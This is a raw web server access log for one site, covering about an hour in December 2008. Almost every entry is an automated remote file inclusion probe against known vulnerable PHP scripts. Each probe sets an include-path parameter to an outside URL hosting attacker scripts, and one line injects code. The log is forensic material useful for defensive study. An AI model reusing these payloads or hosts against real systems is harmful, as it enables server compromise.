74.55.13.210 - - [03/Dec/2008:04:00:00 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
66.244.236.243 - - [03/Dec/2008:04:00:15 -0800] "GET /logs/access_081101.log/index2.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
66.244.236.243 - - [03/Dec/2008:04:00:15 -0800] "GET /index2.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
66.244.236.243 - - [03/Dec/2008:04:00:16 -0800] "GET /logs/index2.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
64.185.238.20 - - [03/Dec/2008:04:01:13 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://wildfood.co.kr/home//data/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "serevents.com"
64.185.238.20 - - [03/Dec/2008:04:01:13 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://wildfood.co.kr/home//data/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "serevents.com"
64.185.238.20 - - [03/Dec/2008:04:01:13 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://wildfood.co.kr/home//data/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "serevents.com"
74.55.13.210 - - [03/Dec/2008:04:02:07 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "serevents.com"
77.232.66.107 - - [03/Dec/2008:04:02:50 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
77.232.66.107 - - [03/Dec/2008:04:02:50 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
77.232.66.107 - - [03/Dec/2008:04:02:51 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
74.55.13.210 - - [03/Dec/2008:04:03:07 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
74.55.13.210 - - [03/Dec/2008:04:03:07 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
74.55.13.210 - - [03/Dec/2008:04:03:07 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
64.185.238.20 - - [03/Dec/2008:04:03:29 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://wildfood.co.kr/home//data/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.serevents.com"
64.185.238.20 - - [03/Dec/2008:04:03:29 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://wildfood.co.kr/home//data/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.serevents.com"
74.55.13.210 - - [03/Dec/2008:04:04:01 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
74.55.13.210 - - [03/Dec/2008:04:04:01 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
74.55.13.210 - - [03/Dec/2008:04:04:01 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
207.226.88.17 - - [03/Dec/2008:04:04:29 -0800] "GET /logs/access.log/?_REQUEST=&_REQUEST[option]=com_pollxt&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
207.226.88.17 - - [03/Dec/2008:04:04:29 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_pollxt&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.serevents.com"
207.226.88.17 - - [03/Dec/2008:04:04:29 -0800] "GET /logs/?_REQUEST=&_REQUEST[option]=com_pollxt&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 1081 "-" "libwww-perl/5.79" "www.serevents.com"
69.64.48.225 - - [03/Dec/2008:04:06:19 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.serevents.com"
69.64.48.225 - - [03/Dec/2008:04:06:19 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.serevents.com"
69.65.42.208 - - [03/Dec/2008:04:06:45 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.serevents.com"
69.65.42.208 - - [03/Dec/2008:04:06:46 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.serevents.com"
85.119.152.185 - - [03/Dec/2008:04:07:13 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "serevents.com"
85.119.152.185 - - [03/Dec/2008:04:07:13 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "serevents.com"
85.119.152.185 - - [03/Dec/2008:04:07:13 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "serevents.com"
91.192.20.164 - - [03/Dec/2008:04:08:30 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://computare.freehyperspace5.com/header.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
200.35.150.45 - - [03/Dec/2008:04:08:54 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.serevents.com"
200.35.150.45 - - [03/Dec/2008:04:08:54 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.serevents.com"
87.101.4.49 - - [03/Dec/2008:04:10:53 -0800] "GET /logs/access_081101.log//?mosConfig_absolute_path=http://www.rearrangefurniture.com/myimages/log/backup.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
87.101.4.49 - - [03/Dec/2008:04:10:53 -0800] "GET /?mosConfig_absolute_path=http://www.rearrangefurniture.com/myimages/log/backup.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.serevents.com"
87.101.4.49 - - [03/Dec/2008:04:10:54 -0800] "GET /logs//?mosConfig_absolute_path=http://www.rearrangefurniture.com/myimages/log/backup.txt??? HTTP/1.1" 200 1086 "-" "libwww-perl/5.79" "www.serevents.com"
59.125.183.76 - - [03/Dec/2008:04:17:14 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
59.125.183.76 - - [03/Dec/2008:04:17:15 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
59.125.183.76 - - [03/Dec/2008:04:17:15 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
65.98.56.154 - - [03/Dec/2008:04:21:26 -0800] "GET /logs/access.log//include.php?path[docroot]=http://www.jjran.com/board/skin/zero_vote/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "serevents.com"
65.98.56.154 - - [03/Dec/2008:04:21:26 -0800] "GET /logs//include.php?path[docroot]=http://www.jjran.com/board/skin/zero_vote/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "serevents.com"
65.98.56.154 - - [03/Dec/2008:04:21:26 -0800] "GET /include.php?path[docroot]=http://www.jjran.com/board/skin/zero_vote/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "serevents.com"
85.114.133.139 - - [03/Dec/2008:04:22:40 -0800] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
85.114.133.139 - - [03/Dec/2008:04:22:41 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
85.114.133.139 - - [03/Dec/2008:04:22:42 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
89.218.85.18 - - [03/Dec/2008:04:23:29 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.buffalosbest.com//config/heading_help.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
74.55.13.210 - - [03/Dec/2008:04:24:26 -0800] "GET /logs/access_081101.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
79.148.238.69 - - [03/Dec/2008:04:32:57 -0800] "GET /include.php?path[docroot]=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
79.148.238.69 - - [03/Dec/2008:04:44:42 -0800] "GET /logs//include.php?path[docroot]=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
79.148.238.69 - - [03/Dec/2008:04:44:42 -0800] "GET /logs//include.php?path[docroot]=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
79.148.238.69 - - [03/Dec/2008:04:44:43 -0800] "GET /include.php?path[docroot]=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
79.148.238.69 - - [03/Dec/2008:04:44:43 -0800] "GET /include.php?path[docroot]=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
74.55.13.210 - - [03/Dec/2008:04:47:48 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "serevents.com"
74.55.13.210 - - [03/Dec/2008:04:47:48 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "serevents.com"
74.55.13.210 - - [03/Dec/2008:04:47:49 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "serevents.com"
210.118.170.35 - - [03/Dec/2008:04:48:34 -0800] "GET /logs/access.log//claroline/phpbb/page_tail.php?includePath=http://wisemaker.co.kr/bbs/r0x.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "serevents.com"
210.118.170.35 - - [03/Dec/2008:04:48:39 -0800] "GET /claroline/phpbb/page_tail.php?includePath=http://wisemaker.co.kr/bbs/r0x.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "serevents.com"
210.118.170.35 - - [03/Dec/2008:04:48:39 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://wisemaker.co.kr/bbs/r0x.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "serevents.com"
210.118.170.35 - - [03/Dec/2008:04:49:51 -0800] "GET /logs/scripts.log//claroline/phpbb/page_tail.php?includePath=http://wisemaker.co.kr/bbs/r0x.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.serevents.com"
210.118.170.35 - - [03/Dec/2008:04:49:55 -0800] "GET /claroline/phpbb/page_tail.php?includePath=http://wisemaker.co.kr/bbs/r0x.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.serevents.com"
210.118.170.35 - - [03/Dec/2008:04:49:55 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://wisemaker.co.kr/bbs/r0x.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.serevents.com"
208.69.192.200 - - [03/Dec/2008:04:49:59 -0800] "GET /logs//errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "serevents.com"
208.69.192.200 - - [03/Dec/2008:04:50:00 -0800] "GET /errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "serevents.com"
208.69.192.200 - - [03/Dec/2008:04:50:00 -0800] "GET /logs/access.log//errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "serevents.com"
89.218.85.18 - - [03/Dec/2008:04:51:42 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.buffalosbest.com//config/heading_help.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
89.218.85.18 - - [03/Dec/2008:04:51:42 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.buffalosbest.com//config/heading_help.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
208.69.192.200 - - [03/Dec/2008:04:53:36 -0800] "GET /errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
208.69.192.200 - - [03/Dec/2008:04:53:36 -0800] "GET /logs//errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
211.247.226.253 - - [03/Dec/2008:04:57:19 -0800] "GET /logs/access.log/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.247.226.253 - - [03/Dec/2008:04:57:19 -0800] "GET /errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.247.226.253 - - [03/Dec/2008:04:57:20 -0800] "GET /logs/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
216.104.34.142 - - [03/Dec/2008:04:57:32 -0800] "GET /logs/access.log/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
216.104.34.142 - - [03/Dec/2008:04:57:32 -0800] "GET /errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
216.104.34.142 - - [03/Dec/2008:04:57:32 -0800] "GET /logs/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
207.226.88.17 - - [03/Dec/2008:04:58:49 -0800] "GET /logs/access.log/?_REQUEST=&_REQUEST[option]=com_extcalendar&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
207.226.88.17 - - [03/Dec/2008:04:58:50 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_extcalendar&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.serevents.com"
207.226.88.17 - - [03/Dec/2008:04:58:50 -0800] "GET /logs/?_REQUEST=&_REQUEST[option]=com_extcalendar&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 1081 "-" "libwww-perl/5.79" "www.serevents.com"
79.148.238.69 - - [03/Dec/2008:05:00:47 -0800] "GET /logs/access.log//include.php?path[docroot]=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
79.148.238.69 - - [03/Dec/2008:05:00:48 -0800] "GET /include.php?path[docroot]=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
79.148.238.69 - - [03/Dec/2008:05:00:48 -0800] "GET /logs//include.php?path[docroot]=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
59.125.183.76 - - [03/Dec/2008:05:01:00 -0800] "GET /logs/access_081101.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
59.125.183.76 - - [03/Dec/2008:05:01:01 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
59.125.183.76 - - [03/Dec/2008:05:01:01 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
64.34.166.205 - - [03/Dec/2008:05:04:03 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://photoclubus.com/board/my%20.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.serevents.com"
64.34.166.205 - - [03/Dec/2008:05:04:04 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://photoclubus.com/board/my%20.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.serevents.com"
59.125.183.76 - - [03/Dec/2008:05:09:06 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
59.125.183.76 - - [03/Dec/2008:05:09:06 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
59.125.183.76 - - [03/Dec/2008:05:12:20 -0800] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
59.125.183.76 - - [03/Dec/2008:05:12:20 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
59.125.183.76 - - [03/Dec/2008:05:12:21 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
218.239.45.154 - - [03/Dec/2008:05:15:18 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.lohby.de/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.serevents.com"
218.239.45.154 - - [03/Dec/2008:05:15:18 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://www.lohby.de/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.serevents.com"
208.69.192.200 - - [03/Dec/2008:05:15:41 -0800] "GET /logs/access.log//atom.php5?page=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "serevents.com"
208.69.192.200 - - [03/Dec/2008:05:15:41 -0800] "GET /atom.php5?page=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "serevents.com"
208.69.192.200 - - [03/Dec/2008:05:15:41 -0800] "GET /logs//atom.php5?page=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "serevents.com"
124.0.71.7 - - [03/Dec/2008:05:15:53 -0800] "GET /logs/access.log/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
124.0.71.7 - - [03/Dec/2008:05:15:53 -0800] "GET /errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
124.0.71.7 - - [03/Dec/2008:05:15:54 -0800] "GET /logs/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
208.69.192.200 - - [03/Dec/2008:05:16:11 -0800] "GET /logs/access.log%20//atom.php5?page=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "serevents.com"
89.104.81.61 - - [03/Dec/2008:05:20:16 -0800] "GET /logs/access.log/errors.php?error=http://sprau.se/images/1218658693.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.serevents.com"
89.104.81.61 - - [03/Dec/2008:05:20:17 -0800] "GET /errors.php?error=http://sprau.se/images/1218658693.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.serevents.com"
89.104.81.61 - - [03/Dec/2008:05:20:17 -0800] "GET /logs/errors.php?error=http://sprau.se/images/1218658693.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.serevents.com"
200.212.63.51 - - [03/Dec/2008:05:20:31 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.freewebs.com/albfranci/scan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
208.69.192.200 - - [03/Dec/2008:05:20:39 -0800] "GET /errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
208.69.192.200 - - [03/Dec/2008:05:20:39 -0800] "GET /logs//errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
208.69.192.200 - - [03/Dec/2008:05:20:39 -0800] "GET /logs/access_081101.log//errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
174.133.70.138 - - [03/Dec/2008:05:21:12 -0800] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.tos-belarus.org/data/id.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.serevents.com"
174.133.70.138 - - [03/Dec/2008:05:21:12 -0800] "GET /logs//modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.tos-belarus.org/data/id.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.serevents.com"
174.133.70.138 - - [03/Dec/2008:05:21:28 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tos-belarus.org/data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.serevents.com"
174.133.70.138 - - [03/Dec/2008:05:21:28 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tos-belarus.org/data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.serevents.com"
174.133.70.138 - - [03/Dec/2008:05:23:43 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tos-belarus.org/data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "serevents.com"
174.133.70.138 - - [03/Dec/2008:05:23:43 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tos-belarus.org/data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "serevents.com"
174.133.70.138 - - [03/Dec/2008:05:23:54 -0800] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.tos-belarus.org/data/id.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "serevents.com"
174.133.70.138 - - [03/Dec/2008:05:23:54 -0800] "GET /logs//modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.tos-belarus.org/data/id.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "serevents.com"
218.239.45.154 - - [03/Dec/2008:05:24:20 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://www.lohby.de/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "serevents.com"
218.239.45.154 - - [03/Dec/2008:05:24:20 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.lohby.de/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "serevents.com"
200.212.63.51 - - [03/Dec/2008:05:25:36 -0800] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.freewebs.com/albfranci/scan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
207.210.80.210 - - [03/Dec/2008:05:26:04 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "serevents.com"
207.210.80.210 - - [03/Dec/2008:05:26:06 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "serevents.com"
